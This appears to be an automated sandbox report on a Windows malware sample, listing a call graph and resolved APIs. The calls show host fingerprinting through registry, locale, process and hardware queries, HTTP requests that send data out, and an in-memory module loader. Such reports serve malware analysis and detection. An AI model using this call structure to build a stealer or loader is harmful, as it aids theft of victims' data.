62a9b0 4 API calls 14501->14502 14503 615daf 14502->14503 14504 62a8a0 lstrcpy 14503->14504 14505 615db8 14504->14505 14506 62a9b0 4 API calls 14505->14506 14507 615dd9 14506->14507 14508 62a8a0 lstrcpy 14507->14508 14509 615de2 14508->14509 14510 62a9b0 4 API calls 14509->14510 14511 615e02 14510->14511 14512 62a8a0 lstrcpy 14511->14512 14513 615e0b 14512->14513 14514 62a9b0 4 API calls 14513->14514 14515 615e2a 14514->14515 14516 62a8a0 lstrcpy 14515->14516 14517 615e33 14516->14517 14518 62a920 3 API calls 14517->14518 14519 615e54 14518->14519 14520 62a8a0 lstrcpy 14519->14520 14521 615e5d 14520->14521 14522 615e70 lstrlen 14521->14522 15316 62aad0 14522->15316 14524 615e81 lstrlen GetProcessHeap RtlAllocateHeap 15317 62aad0 14524->15317 14526 615eae lstrlen 14527 615ebe 14526->14527 14528 615ed7 lstrlen 14527->14528 14529 615ee7 14528->14529 14530 615ef0 lstrlen 14529->14530 14531 615f04 14530->14531 14532 615f1a lstrlen 14531->14532 15318 62aad0 14532->15318 14534 615f2a HttpSendRequestA 14535 615f35 InternetReadFile 14534->14535 14536 615f6a InternetCloseHandle 14535->14536 14540 615f61 14535->14540 14536->14460 14538 62a9b0 4 API calls 14538->14540 14539 62a8a0 lstrcpy 14539->14540 14540->14535 14540->14536 14540->14538 14540->14539 14542 621077 14541->14542 14543 621151 14542->14543 14544 62a820 lstrlen lstrcpy 14542->14544 14543->13312 14544->14542 14546 620db7 14545->14546 14547 620f17 14546->14547 14548 620e27 StrCmpCA 14546->14548 14549 620e67 StrCmpCA 14546->14549 14550 620ea4 StrCmpCA 14546->14550 14551 62a820 lstrlen lstrcpy 14546->14551 14547->13320 14548->14546 14549->14546 14550->14546 14551->14546 14555 620f67 14552->14555 14553 621044 14553->13328 14554 620fb2 StrCmpCA 14554->14555 14555->14553 14555->14554 14556 62a820 lstrlen lstrcpy 14555->14556 14556->14555 14558 62a740 lstrcpy 14557->14558 14559 621a26 14558->14559 14560 62a9b0 4 API calls 14559->14560 14561 621a37 14560->14561 14562 62a8a0 lstrcpy 14561->14562 14563 621a40 14562->14563 14564 62a9b0 4 API calls 14563->14564 14565 621a5b 14564->14565 14566 62a8a0 lstrcpy 14565->14566 14567 621a64 14566->14567 14568 62a9b0 4 API calls 14567->14568 14569 621a7d 14568->14569 14570 62a8a0 lstrcpy 14569->14570 14571 621a86 14570->14571 14572 62a9b0 4 API calls 14571->14572 14573 621aa1 14572->14573 14574 62a8a0 lstrcpy 14573->14574 14575 621aaa 14574->14575 14576 62a9b0 4 API calls 14575->14576 14577 621ac3 14576->14577 14578 62a8a0 lstrcpy 14577->14578 14579 621acc 14578->14579 14580 62a9b0 4 API calls 14579->14580 14581 621ae7 14580->14581 14582 62a8a0 lstrcpy 14581->14582 14583 621af0 14582->14583 14584 62a9b0 4 API calls 14583->14584 14585 621b09 14584->14585 14586 62a8a0 lstrcpy 14585->14586 14587 621b12 14586->14587 14588 62a9b0 4 API calls 14587->14588 14589 621b2d 14588->14589 14590 62a8a0 lstrcpy 14589->14590 14591 621b36 14590->14591 14592 62a9b0 4 API calls 14591->14592 14593 621b4f 14592->14593 14594 62a8a0 lstrcpy 14593->14594 14595 621b58 14594->14595 14596 62a9b0 4 API calls 14595->14596 14597 621b76 14596->14597 14598 62a8a0 lstrcpy 14597->14598 14599 621b7f 14598->14599 14600 627500 6 API calls 14599->14600 14601 621b96 14600->14601 14602 62a920 3 API calls 14601->14602 14603 621ba9 14602->14603 14604 62a8a0 lstrcpy 14603->14604 14605 621bb2 14604->14605 14606 62a9b0 4 API calls 14605->14606 14607 621bdc 14606->14607 14608 62a8a0 lstrcpy 14607->14608 14609 621be5 14608->14609 14610 62a9b0 4 API calls 14609->14610 14611 621c05 14610->14611 14612 62a8a0 lstrcpy 14611->14612 14613 621c0e 14612->14613 15319 627690 GetProcessHeap RtlAllocateHeap 14613->15319 14616 62a9b0 4 API calls 14617 621c2e 14616->14617 14618 62a8a0 lstrcpy 14617->14618 14619 621c37 14618->14619 14620 62a9b0 4 API calls 14619->14620 14621 621c56 14620->14621 14622 62a8a0 lstrcpy 14621->14622 14623 621c5f 14622->14623 14624 62a9b0 4 API calls 14623->14624 14625 621c80 14624->14625 14626 62a8a0 lstrcpy 14625->14626 14627 621c89 14626->14627 15326 6277c0 GetCurrentProcess IsWow64Process 14627->15326 14630 62a9b0 4 API calls 14631 621ca9 14630->14631 14632 62a8a0 lstrcpy 14631->14632 14633 621cb2 14632->14633 14634 62a9b0 4 API calls 14633->14634 14635 621cd1 14634->14635 14636 62a8a0 lstrcpy 14635->14636 14637 621cda 14636->14637 14638 62a9b0 4 API calls 14637->14638 14639 621cfb 14638->14639 14640 62a8a0 lstrcpy 14639->14640 14641 621d04 14640->14641 14642 627850 3 API calls 14641->14642 14643 621d14 14642->14643 14644 62a9b0 4 API calls 14643->14644 14645 621d24 14644->14645 14646 62a8a0 lstrcpy 14645->14646 14647 621d2d 14646->14647 14648 62a9b0 4 API calls 14647->14648 14649 621d4c 14648->14649 14650 62a8a0 lstrcpy 14649->14650 14651 621d55 14650->14651 14652 62a9b0 4 API calls 14651->14652 14653 621d75 14652->14653 14654 62a8a0 lstrcpy 14653->14654 14655 621d7e 14654->14655 14656 6278e0 3 API calls 14655->14656 14657 621d8e 14656->14657 14658 62a9b0 4 API calls 14657->14658 14659 621d9e 14658->14659 14660 62a8a0 lstrcpy 14659->14660 14661 621da7 14660->14661 14662 62a9b0 4 API calls 14661->14662 14663 621dc6 14662->14663 14664 62a8a0 lstrcpy 14663->14664 14665 621dcf 14664->14665 14666 62a9b0 4 API calls 14665->14666 14667 621df0 14666->14667 14668 62a8a0 lstrcpy 14667->14668 14669 621df9 14668->14669 15328 627980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14669->15328 14672 62a9b0 4 API calls 14673 621e19 14672->14673 14674 62a8a0 lstrcpy 14673->14674 14675 621e22 14674->14675 14676 62a9b0 4 API calls 14675->14676 14677 621e41 14676->14677 14678 62a8a0 lstrcpy 14677->14678 14679 621e4a 14678->14679 14680 62a9b0 4 API calls 14679->14680 14681 621e6b 14680->14681 14682 62a8a0 lstrcpy 14681->14682 14683 621e74 14682->14683 15330 627a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14683->15330 14686 62a9b0 4 API calls 14687 621e94 14686->14687 14688 62a8a0 lstrcpy 14687->14688 14689 621e9d 14688->14689 14690 62a9b0 4 API calls 14689->14690 14691 621ebc 14690->14691 14692 62a8a0 lstrcpy 14691->14692 14693 621ec5 14692->14693 14694 62a9b0 4 API calls 14693->14694 14695 621ee5 14694->14695 14696 62a8a0 lstrcpy 14695->14696 14697 621eee 14696->14697 15333 627b00 GetUserDefaultLocaleName 14697->15333 14700 62a9b0 4 API calls 14701 621f0e 14700->14701 14702 62a8a0 lstrcpy 14701->14702 14703 621f17 14702->14703 14704 62a9b0 4 API calls 14703->14704 14705 621f36 14704->14705 14706 62a8a0 lstrcpy 14705->14706 14707 621f3f 14706->14707 14708 62a9b0 4 API calls 14707->14708 14709 621f60 14708->14709 14710 62a8a0 lstrcpy 14709->14710 14711 621f69 14710->14711 15337 627b90 14711->15337 14713 621f80 14714 62a920 3 API calls 14713->14714 14715 621f93 14714->14715 14716 62a8a0 lstrcpy 14715->14716 14717 621f9c 14716->14717 14718 62a9b0 4 API calls 14717->14718 14719 621fc6 14718->14719 14720 62a8a0 lstrcpy 14719->14720 14721 621fcf 14720->14721 14722 62a9b0 4 API calls 14721->14722 14723 621fef 14722->14723 14724 62a8a0 lstrcpy 14723->14724 14725 621ff8 14724->14725 15349 627d80 GetSystemPowerStatus 14725->15349 14728 62a9b0 4 API calls 14729 622018 14728->14729 14730 62a8a0 lstrcpy 14729->14730 14731 622021 14730->14731 14732 62a9b0 4 API calls 14731->14732 14733 622040 14732->14733 14734 62a8a0 lstrcpy 14733->14734 14735 622049 14734->14735 14736 62a9b0 4 API calls 14735->14736 14737 62206a 14736->14737 14738 62a8a0 lstrcpy 14737->14738 14739 622073 14738->14739 14740 62207e GetCurrentProcessId 14739->14740 15351 629470 OpenProcess 14740->15351 14743 62a920 3 API calls 14744 6220a4 14743->14744 14745 62a8a0 lstrcpy 14744->14745 14746 6220ad 14745->14746 14747 62a9b0 4 API calls 14746->14747 14748 6220d7 14747->14748 14749 62a8a0 lstrcpy 14748->14749 14750 6220e0 14749->14750 14751 62a9b0 4 API calls 14750->14751 14752 622100 14751->14752 14753 62a8a0 lstrcpy 14752->14753 14754 622109 14753->14754 15356 627e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14754->15356 14757 62a9b0 4 API calls 14758 622129 14757->14758 14759 62a8a0 lstrcpy 14758->14759 14760 622132 14759->14760 14761 62a9b0 4 API calls 14760->14761 14762 622151 14761->14762 14763 62a8a0 lstrcpy 14762->14763 14764 62215a 14763->14764 14765 62a9b0 4 API calls 14764->14765 14766 62217b 14765->14766 14767 62a8a0 lstrcpy 14766->14767 14768 622184 14767->14768 15360 627f60 14768->15360 14771 62a9b0 4 API calls 14772 6221a4 14771->14772 14773 62a8a0 lstrcpy 14772->14773 14774 6221ad 14773->14774 14775 62a9b0 4 API calls 14774->14775 14776 6221cc 14775->14776 14777 62a8a0 lstrcpy 14776->14777 14778 6221d5 14777->14778 14779 62a9b0 4 API calls 14778->14779 14780 6221f6 14779->14780 14781 62a8a0 lstrcpy 14780->14781 14782 6221ff 14781->14782 15373 627ed0 GetSystemInfo wsprintfA 14782->15373 14785 62a9b0 4 API calls 14786 62221f 14785->14786 14787 62a8a0 lstrcpy 14786->14787 14788 622228 14787->14788 14789 62a9b0 4 API calls 14788->14789 14790 622247 14789->14790 14791 62a8a0 lstrcpy 14790->14791 14792 622250 14791->14792 14793 62a9b0 4 API calls 14792->14793 14794 622270 14793->14794 14795 62a8a0 lstrcpy 14794->14795 14796 622279 14795->14796 15375 628100 GetProcessHeap RtlAllocateHeap 14796->15375 14799 62a9b0 4 API calls 14800 622299 14799->14800 14801 62a8a0 lstrcpy 14800->14801 14802 6222a2 14801->14802 14803 62a9b0 4 API calls 14802->14803 14804 6222c1 14803->14804 14805 62a8a0 lstrcpy 14804->14805 14806 6222ca 14805->14806 14807 62a9b0 4 API calls 14806->14807 14808 6222eb 14807->14808 14809 62a8a0 lstrcpy 14808->14809 14810 6222f4 14809->14810 15381 6287c0 14810->15381 14813 62a920 3 API calls 14814 62231e 14813->14814 14815 62a8a0 lstrcpy 14814->14815 14816 622327 14815->14816 14817 62a9b0 4 API calls 14816->14817 14818 622351 14817->14818 14819 62a8a0 lstrcpy 14818->14819 14820 62235a 14819->14820 14821 62a9b0 4 API calls 14820->14821 14822 62237a 14821->14822 14823 62a8a0 lstrcpy 14822->14823 14824 622383 14823->14824 14825 62a9b0 4 API calls 14824->14825 14826 6223a2 14825->14826 14827 62a8a0 lstrcpy 14826->14827 14828 6223ab 14827->14828 15386 6281f0 14828->15386 14830 6223c2 14831 62a920 3 API calls 14830->14831 14832 6223d5 14831->14832 14833 62a8a0 lstrcpy 14832->14833 14834 6223de 14833->14834 14835 62a9b0 4 API calls 14834->14835 14836 62240a 14835->14836 14837 62a8a0 lstrcpy 14836->14837 14838 622413 14837->14838 14839 62a9b0 4 API calls 14838->14839 14840 622432 14839->14840 14841 62a8a0 lstrcpy 14840->14841 14842 62243b 14841->14842 14843 62a9b0 4 API calls 14842->14843 14844 62245c 14843->14844 14845 62a8a0 lstrcpy 14844->14845 14846 622465 14845->14846 14847 62a9b0 4 API calls 14846->14847 14848 622484 14847->14848 14849 62a8a0 lstrcpy 14848->14849 14850 62248d 14849->14850 14851 62a9b0 4 API calls 14850->14851 14852 6224ae 14851->14852 14853 62a8a0 lstrcpy 14852->14853 14854 6224b7 14853->14854 15394 628320 14854->15394 14856 6224d3 14857 62a920 3 API calls 14856->14857 14858 6224e6 14857->14858 14859 62a8a0 lstrcpy 14858->14859 14860 6224ef 14859->14860 14861 62a9b0 4 API calls 14860->14861 14862 622519 14861->14862 14863 62a8a0 lstrcpy 14862->14863 14864 622522 14863->14864 14865 62a9b0 4 API calls 14864->14865 14866 622543 14865->14866 14867 62a8a0 lstrcpy 14866->14867 14868 62254c 14867->14868 14869 628320 17 API calls 14868->14869 14870 622568 14869->14870 14871 62a920 3 API calls 14870->14871 14872 62257b 14871->14872 14873 62a8a0 lstrcpy 14872->14873 14874 622584 14873->14874 14875 62a9b0 4 API calls 14874->14875 14876 6225ae 14875->14876 14877 62a8a0 lstrcpy 14876->14877 14878 6225b7 14877->14878 14879 62a9b0 4 API calls 14878->14879 14880 6225d6 14879->14880 14881 62a8a0 lstrcpy 14880->14881 14882 6225df 14881->14882 14883 62a9b0 4 API calls 14882->14883 14884 622600 14883->14884 14885 62a8a0 lstrcpy 14884->14885 14886 622609 14885->14886 15430 628680 14886->15430 14888 622620 14889 62a920 3 API calls 14888->14889 14890 622633 14889->14890 14891 62a8a0 lstrcpy 14890->14891 14892 62263c 14891->14892 14893 62265a lstrlen 14892->14893 14894 62266a 14893->14894 14895 62a740 lstrcpy 14894->14895 14896 62267c 14895->14896 14897 611590 lstrcpy 14896->14897 14898 62268d 14897->14898 15440 625190 14898->15440 14900 622699 14900->13332 15628 62aad0 14901->15628 14903 615009 InternetOpenUrlA 14907 615021 14903->14907 14904 6150a0 InternetCloseHandle InternetCloseHandle 14906 6150ec 14904->14906 14905 61502a InternetReadFile 14905->14907 14906->13336 14907->14904 14907->14905 15629 6198d0 14908->15629 14910 620759 14911 620a38 14910->14911 14912 62077d 14910->14912 14913 611590 lstrcpy 14911->14913 14915 620799 StrCmpCA 14912->14915 14914 620a49 14913->14914 15805 620250 14914->15805 14917 6207a8 14915->14917 14944 620843 14915->14944 14919 62a7a0 lstrcpy 14917->14919 14921 6207c3 14919->14921 14920 620865 StrCmpCA 14922 620874 14920->14922 14924 62096b 14920->14924 14923 611590 lstrcpy 14921->14923 14925 62a740 lstrcpy 14922->14925 14926 62080c 14923->14926 14928 62099c StrCmpCA 14924->14928 14929 620881 14925->14929 14927 62a7a0 lstrcpy 14926->14927 14930 620823 14927->14930 14931 620a2d 14928->14931 14932 6209ab 14928->14932 14933 62a9b0 4 API calls 14929->14933 14934 62a7a0 lstrcpy 14930->14934 14931->13340 14935 611590 lstrcpy 14932->14935 14936 6208ac 14933->14936 14937 62083e 14934->14937 14938 6209f4 14935->14938 14939 62a920 3 API calls 14936->14939 15632 61fb00 14937->15632 14941 62a7a0 lstrcpy 14938->14941 14942 6208b3 14939->14942 14945 620a0d 14941->14945 14943 62a9b0 4 API calls 14942->14943 14946 6208ba 14943->14946 14944->14920 14947 62a7a0 lstrcpy 14945->14947 14949 62a8a0 lstrcpy 14946->14949 14948 620a28 14947->14948 15748 620030 14948->15748 15280 62a7a0 lstrcpy 15279->15280 15281 611683 15280->15281 15282 62a7a0 lstrcpy 15281->15282 15283 611695 15282->15283 15284 62a7a0 lstrcpy 15283->15284 15285 6116a7 15284->15285 15286 62a7a0 lstrcpy 15285->15286 15287 6115a3 15286->15287 15287->14163 15289 6147c6 15288->15289 15290 614838 lstrlen 15289->15290 15314 62aad0 15290->15314 15292 614848 InternetCrackUrlA 15293 614867 15292->15293 15293->14240 15295 62a740 lstrcpy 15294->15295 15296 628b74 15295->15296 15297 62a740 lstrcpy 15296->15297 15298 628b82 GetSystemTime 15297->15298 15300 628b99 15298->15300 15299 62a7a0 lstrcpy 15301 628bfc 15299->15301 15300->15299 15301->14255 15303 62a931 15302->15303 15304 62a988 15303->15304 15306 62a968 lstrcpy lstrcat 15303->15306 15305 62a7a0 lstrcpy 15304->15305 15307 62a994 15305->15307 15306->15304 15307->14258 15308->14373 15310 619af9 LocalAlloc 15309->15310 15311 614eee 15309->15311 15310->15311 15312 619b14 CryptStringToBinaryA 15310->15312 15311->14261 15311->14263 15312->15311 15313 619b39 LocalFree 15312->15313 15313->15311 15314->15292 15315->14383 15316->14524 15317->14526 15318->14534 15447 6277a0 15319->15447 15322 6276c6 RegOpenKeyExA 15324 6276e7 RegQueryValueExA 15322->15324 15325 627704 RegCloseKey 15322->15325 15323 621c1e 15323->14616 15324->15325 15325->15323 15327 621c99 15326->15327 15327->14630 15329 621e09 15328->15329 15329->14672 15331 621e84 15330->15331 15332 627a9a wsprintfA 15330->15332 15331->14686 15332->15331 15334 621efe 15333->15334 15335 627b4d 15333->15335 15334->14700 15454 628d20 LocalAlloc CharToOemW 15335->15454 15338 62a740 lstrcpy 15337->15338 15339 627bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15338->15339 15346 627c25 15339->15346 15340 627c46 GetLocaleInfoA 15340->15346 15341 627d18 15342 627d28 15341->15342 15343 627d1e LocalFree 15341->15343 15345 62a7a0 lstrcpy 15342->15345 15343->15342 15344 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15344->15346 15348 627d37 15345->15348 15346->15340 15346->15341 15346->15344 15347 62a8a0 lstrcpy 15346->15347 15347->15346 15348->14713 15350 622008 15349->15350 15350->14728 15352 629493 GetModuleFileNameExA CloseHandle 15351->15352 15353 6294b5 15351->15353 15352->15353 15354 62a740 lstrcpy 15353->15354 15355 622091 15354->15355 15355->14743 15357 622119 15356->15357 15358 627e68 RegQueryValueExA 15356->15358 15357->14757 15359 627e8e RegCloseKey 15358->15359 15359->15357 15361 627fb9 GetLogicalProcessorInformationEx 15360->15361 15362 627fd8 GetLastError 15361->15362 15363 628029 15361->15363 15364 628022 15362->15364 15372 627fe3 15362->15372 15369 6289f0 2 API calls 15363->15369 15367 6289f0 2 API calls 15364->15367 15368 622194 15364->15368 15367->15368 15368->14771 15370 62807b 15369->15370 15370->15364 15371 628084 wsprintfA 15370->15371 15371->15368 15372->15361 15372->15368 15455 6289f0 15372->15455 15458 628a10 GetProcessHeap RtlAllocateHeap 15372->15458 15374 62220f 15373->15374 15374->14785 15376 6289b0 15375->15376 15377 62814d GlobalMemoryStatusEx 15376->15377 15380 628163 __aulldiv 15377->15380 15378 62819b wsprintfA 15379 622289 15378->15379 15379->14799 15380->15378 15382 6287fb GetProcessHeap RtlAllocateHeap wsprintfA 15381->15382 15384 62a740 lstrcpy 15382->15384 15385 62230b 15384->15385 15385->14813 15387 62a740 lstrcpy 15386->15387 15393 628229 15387->15393 15388 628263 15389 62a7a0 lstrcpy 15388->15389 15391 6282dc 15389->15391 15390 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15390->15393 15391->14830 15392 62a8a0 lstrcpy 15392->15393 15393->15388 15393->15390 15393->15392 15395 62a740 lstrcpy 15394->15395 15396 62835c RegOpenKeyExA 15395->15396 15397 6283d0 15396->15397 15398 6283ae 15396->15398 15400 628613 RegCloseKey 15397->15400 15401 6283f8 RegEnumKeyExA 15397->15401 15399 62a7a0 lstrcpy 15398->15399 15411 6283bd 15399->15411 15404 62a7a0 lstrcpy 15400->15404 15402 62860e 15401->15402 15403 62843f wsprintfA RegOpenKeyExA 15401->15403 15402->15400 15405 6284c1 RegQueryValueExA 15403->15405 15406 628485 RegCloseKey RegCloseKey 15403->15406 15404->15411 15407 628601 RegCloseKey 15405->15407 15408 6284fa lstrlen 15405->15408 15409 62a7a0 lstrcpy 15406->15409 15407->15402 15408->15407 15410 628510 15408->15410 15409->15411 15412 62a9b0 4 API calls 15410->15412 15411->14856 15413 628527 15412->15413 15414 62a8a0 lstrcpy 15413->15414 15415 628533 15414->15415 15416 62a9b0 4 API calls 15415->15416 15417 628557 15416->15417 15418 62a8a0 lstrcpy 15417->15418 15419 628563 15418->15419 15420 62856e RegQueryValueExA 15419->15420 15420->15407 15421 6285a3 15420->15421 15422 62a9b0 4 API calls 15421->15422 15423 6285ba 15422->15423 15424 62a8a0 lstrcpy 15423->15424 15425 6285c6 15424->15425 15426 62a9b0 4 API calls 15425->15426 15427 6285ea 15426->15427 15428 62a8a0 lstrcpy 15427->15428 15429 6285f6 15428->15429 15429->15407 15431 62a740 lstrcpy 15430->15431 15432 6286bc CreateToolhelp32Snapshot Process32First 15431->15432 15433 6286e8 Process32Next 15432->15433 15434 62875d CloseHandle 15432->15434 15433->15434 15436 6286fd 15433->15436 15435 62a7a0 lstrcpy 15434->15435 15437 628776 15435->15437 15436->15433 15438 62a8a0 lstrcpy 15436->15438 15439 62a9b0 lstrcpy lstrlen lstrcpy lstrcat 15436->15439 15437->14888 15438->15436 15439->15436 15441 62a7a0 lstrcpy 15440->15441 15442 6251b5 15441->15442 15443 611590 lstrcpy 15442->15443 15444 6251c6 15443->15444 15459 615100 15444->15459 15446 6251cf 15446->14900 15450 627720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15447->15450 15449 6276b9 15449->15322 15449->15323 15451 627780 RegCloseKey 15450->15451 15452 627765 RegQueryValueExA 15450->15452 15453 627793 15451->15453 15452->15451 15453->15449 15454->15334 15456 6289f9 GetProcessHeap HeapFree 15455->15456 15457 628a0c 15455->15457 15456->15457 15457->15372 15458->15372 15460 62a7a0 lstrcpy 15459->15460 15461 615119 15460->15461 15462 6147b0 2 API calls 15461->15462 15463 615125 15462->15463 15619 628ea0 15463->15619 15465 615184 15466 615192 lstrlen 15465->15466 15467 6151a5 15466->15467 15468 628ea0 4 API calls 15467->15468 15469 6151b6 15468->15469 15470 62a740 lstrcpy 15469->15470 15471 6151c9 15470->15471 15472 62a740 lstrcpy 15471->15472 15473 6151d6 15472->15473 15474 62a740 lstrcpy 15473->15474 15475 6151e3 15474->15475 15476 62a740 lstrcpy 15475->15476 15477 6151f0 15476->15477 15478 62a740 lstrcpy 15477->15478 15479 6151fd InternetOpenA StrCmpCA 15478->15479 15480 61522f 15479->15480 15481 6158c4 InternetCloseHandle 15480->15481 15482 628b60 3 API calls 15480->15482 15488 6158d9 codecvt 15481->15488 15483 61524e 15482->15483 15484 62a920 3 API calls 15483->15484 15485 615261 15484->15485 15486 62a8a0 lstrcpy 15485->15486 15487 61526a 15486->15487 15489 62a9b0 4 API calls 15487->15489 15492 62a7a0 lstrcpy 15488->15492 15490 6152ab 15489->15490 15491 62a920 3 API calls 15490->15491 15493 6152b2 15491->15493 15500 615913 15492->15500 15494 62a9b0 4 API calls 15493->15494 15495 6152b9 15494->15495 15496 62a8a0 lstrcpy 15495->15496 15497 6152c2 15496->15497 15498 62a9b0 4 API calls 15497->15498 15499 615303 15498->15499 15501 62a920 3 API calls 15499->15501 15500->15446 15502 61530a 15501->15502 15503 62a8a0 lstrcpy 15502->15503 15504 615313 15503->15504 15505 615329 InternetConnectA 15504->15505 15505->15481 15506 615359 HttpOpenRequestA 15505->15506 15508 6158b7 InternetCloseHandle 15506->15508 15509 6153b7 15506->15509 15508->15481 15510 62a9b0 4 API calls 15509->15510 15511 6153cb 15510->15511 15512 62a8a0 lstrcpy 15511->15512 15513 6153d4 15512->15513 15514 62a920 3 API calls 15513->15514 15515 6153f2 15514->15515 15516 62a8a0 lstrcpy 15515->15516 15517 6153fb 15516->15517 15518 62a9b0 4 API calls 15517->15518 15519 61541a 15518->15519 15520 62a8a0 lstrcpy 15519->15520 15521 615423 15520->15521 15522 62a9b0 4 API calls 15521->15522 15523 615444 15522->15523 15524 62a8a0 lstrcpy 15523->15524 15525 61544d 15524->15525 15526 62a9b0 4 API calls 15525->15526 15527 61546e 15526->15527 15528 62a8a0 lstrcpy 15527->15528 15620 628ead CryptBinaryToStringA 15619->15620 15621 628ea9 15619->15621 15620->15621 15622 628ece GetProcessHeap RtlAllocateHeap 15620->15622 15621->15465 15622->15621 15623 628ef4 codecvt 15622->15623 15624 628f05 CryptBinaryToStringA 15623->15624 15624->15621 15628->14903 15871 619880 15629->15871 15631 6198e1 15631->14910 15633 62a740 lstrcpy 15632->15633 15634 61fb16 15633->15634 15909 628de0 15634->15909 15806 62a740 lstrcpy 15805->15806 15807 620266 15806->15807 15808 628de0 2 API calls 15807->15808 15809 62027b 15808->15809 15810 62a920 3 API calls 15809->15810 15811 62028b 15810->15811 15812 62a8a0 lstrcpy 15811->15812 15813 620294 15812->15813 15814 62a9b0 4 API calls 15813->15814 15815 6202b8 15814->15815 15872 61988e 15871->15872 15875 616fb0 15872->15875 15874 6198ad codecvt 15874->15631 15878 616d40 15875->15878 15879 616d59 15878->15879 15880 616d63 15878->15880 15879->15874 15880->15879 15892 616660 15880->15892 15882 616dbe 15882->15879 15898 6169b0 15882->15898 15884 616e2a 15884->15879 15885 616ef7 15884->15885 15886 616ee6 VirtualFree 15884->15886 15887 616f26 FreeLibrary 15885->15887 15888 616f38 15885->15888 15891 616f41 15885->15891 15886->15885 15887->15885 15890 6289f0 2 API calls 15888->15890 15889 6289f0 2 API calls 15889->15879 15890->15891 15891->15879 15891->15889 15895 61668f VirtualAlloc 15892->15895 15894 616730 15896 616743 VirtualAlloc 15894->15896 15897 61673c 15894->15897 15895->15894 15895->15897 15896->15897 15897->15882 15899 6169c9 15898->15899 15904 6169d5 15898->15904 15900 616a09 LoadLibraryA 15899->15900 15899->15904 15901 616a32 15900->15901 15900->15904 15902 616ae0 15901->15902 15908 628a10 GetProcessHeap RtlAllocateHeap 15901->15908 15902->15904 15906 616ba8 GetProcAddress 15902->15906 15904->15884 15905 616a8b 15905->15904 15907 6289f0 2 API calls 15905->15907 15906->15902 15906->15904 15907->15902 15908->15905

                          Executed Functions

                          Function 00629860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 629860-629874 call 629750 663 629a93-629af2 LoadLibraryA * 5 660->663 664 62987a-629a8e call 629780 GetProcAddress * 21 660->664 666 629af4-629b08 GetProcAddress 663->666 667 629b0d-629b14 663->667 664->663 666->667 668 629b46-629b4d 667->668 669 629b16-629b41 GetProcAddress * 2 667->669 671 629b68-629b6f 668->671 672 629b4f-629b63 GetProcAddress 668->672 669->668 673 629b71-629b84 GetProcAddress 671->673 674 629b89-629b90 671->674 672->671 673->674 675 629b92-629bbc GetProcAddress * 2 674->675 676 629bc1-629bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01112320), ref: 006298A1
                          • GetProcAddress.KERNEL32(74DD0000,01112338), ref: 006298BA
                          • GetProcAddress.KERNEL32(74DD0000,01112350), ref: 006298D2
                          • GetProcAddress.KERNEL32(74DD0000,01112380), ref: 006298EA
                          • GetProcAddress.KERNEL32(74DD0000,01112428), ref: 00629903
                          • GetProcAddress.KERNEL32(74DD0000,01118F48), ref: 0062991B
                          • GetProcAddress.KERNEL32(74DD0000,01105750), ref: 00629933
                          • GetProcAddress.KERNEL32(74DD0000,01105810), ref: 0062994C
                          • GetProcAddress.KERNEL32(74DD0000,011123C8), ref: 00629964
                          • GetProcAddress.KERNEL32(74DD0000,01112368), ref: 0062997C
                          • GetProcAddress.KERNEL32(74DD0000,011123E0), ref: 00629995
                          • GetProcAddress.KERNEL32(74DD0000,011123F8), ref: 006299AD
                          • GetProcAddress.KERNEL32(74DD0000,01105930), ref: 006299C5
                          • GetProcAddress.KERNEL32(74DD0000,01112410), ref: 006299DE
                          • GetProcAddress.KERNEL32(74DD0000,011124B8), ref: 006299F6
                          • GetProcAddress.KERNEL32(74DD0000,01105730), ref: 00629A0E
                          • GetProcAddress.KERNEL32(74DD0000,011124E8), ref: 00629A27
                          • GetProcAddress.KERNEL32(74DD0000,01112500), ref: 00629A3F
                          • GetProcAddress.KERNEL32(74DD0000,01105A50), ref: 00629A57
                          • GetProcAddress.KERNEL32(74DD0000,01112218), ref: 00629A70
                          • GetProcAddress.KERNEL32(74DD0000,01105A90), ref: 00629A88
                          • LoadLibraryA.KERNEL32(01112578,?,00626A00), ref: 00629A9A
                          • LoadLibraryA.KERNEL32(01112530,?,00626A00), ref: 00629AAB
                          • LoadLibraryA.KERNEL32(01112548,?,00626A00), ref: 00629ABD
                          • LoadLibraryA.KERNEL32(01112518,?,00626A00), ref: 00629ACF
                          • LoadLibraryA.KERNEL32(01112560,?,00626A00), ref: 00629AE0
                          • GetProcAddress.KERNEL32(75A70000,01112590), ref: 00629B02
                          • GetProcAddress.KERNEL32(75290000,011125A8), ref: 00629B23
                          • GetProcAddress.KERNEL32(75290000,011125C0), ref: 00629B3B
                          • GetProcAddress.KERNEL32(75BD0000,011125D8), ref: 00629B5D
                          • GetProcAddress.KERNEL32(75450000,01105830), ref: 00629B7E
                          • GetProcAddress.KERNEL32(76E90000,011190D8), ref: 00629B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00629BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00629BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
